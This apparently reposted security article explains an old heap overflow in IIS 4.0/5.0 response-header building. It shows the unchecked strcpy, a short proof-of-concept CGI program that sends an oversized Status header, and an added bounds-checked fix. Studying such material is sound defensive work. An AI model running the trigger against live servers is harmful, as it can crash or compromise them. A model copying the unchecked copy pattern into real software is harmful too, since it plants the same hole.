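Buffer overflow in IIS's handling of HTML headers. It is an old vulnerability that can be used for privilege escalation or for a remote overflow. The cause: when the returned status is processed, the buffer size is not checked.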
HTTP_REQ_BASE::BuildBaseResponseHeader(
    BUFFER * Response,
    ...
    STR * pstr,
    ...
    )
{
    ......
    if ( !pstr )
    {
    }
    else
    {
        strcpy( (CHAR *) Response->Ptr(), pstr->Str() );
        // buffer overflow (heap overflow): the length of pstr is never checked against the size of Response
        ......
    }
}
/*
cgi.c ver1.0
iis4.0, iis5.0 overflow program
copy by yuange 2003.1.3
*/
#include <stdio.h>
#include <string.h>
#define BUFFSIZE 0x4000
int main(int argc, char **argv)
{
    char buff[BUFFSIZE];
    /* fill the buffer with 'a' and NUL-terminate it */
    memset(buff,'a',BUFFSIZE);
    memset(buff+BUFFSIZE-1,0,1);
    /* emit the CGI Status header followed by the oversized string */
    printf("Status:200ok%s\r\n\r\n\r\n\n\n",buff);
    return(0);
}
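The missing size check in the strcpy above, written as a bounded copy and run against the same 0x4000-byte filler that cgi.c prints. This is an added example, not code from the original post or from IIS; `struct resp_buf`, `copy_status_checked`, `demo` and the `max_cap` limit are hypothetical names and assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the response BUFFER: storage plus its capacity. */
struct resp_buf {
    char  *ptr;
    size_t cap;
};

/* Copy a CGI-supplied status string into the response buffer. The length is
 * checked before any byte is written. Returns 0 on success, -1 on refusal. */
int copy_status_checked(struct resp_buf *resp, const char *status, size_t max_cap)
{
    size_t need = strlen(status) + 1;          /* include the terminating NUL */
    if (need > max_cap)
        return -1;                             /* refuse oversized status text */
    if (need > resp->cap) {
        char *p = realloc(resp->ptr, need);    /* grow instead of overflowing */
        if (p == NULL)
            return -1;
        resp->ptr = p;
        resp->cap = need;
    }
    memcpy(resp->ptr, status, need);
    return 0;
}

/* Constructed input: the same 0x4000-byte 'a' filler the cgi.c above prints. */
int demo(size_t initial_cap, size_t max_cap)
{
    static char filler[0x4000];
    struct resp_buf resp = { malloc(initial_cap), initial_cap };
    int rc;
    if (resp.ptr == NULL)
        return -2;
    memset(filler, 'a', sizeof filler - 1);
    filler[sizeof filler - 1] = '\0';
    rc = copy_status_checked(&resp, filler, max_cap);
    free(resp.ptr);
    return rc;
}

int main(void)
{
    printf("cap 512, limit 1024:  %d\n", demo(512, 1024));    /* refused */
    printf("cap 512, limit 65536: %d\n", demo(512, 65536));   /* grown, copied */
    return 0;
}
```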
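This article was written or collected by the site owner and does not represent the position of this site. If you repost it, please cite the source: http://yesck.com/post/385/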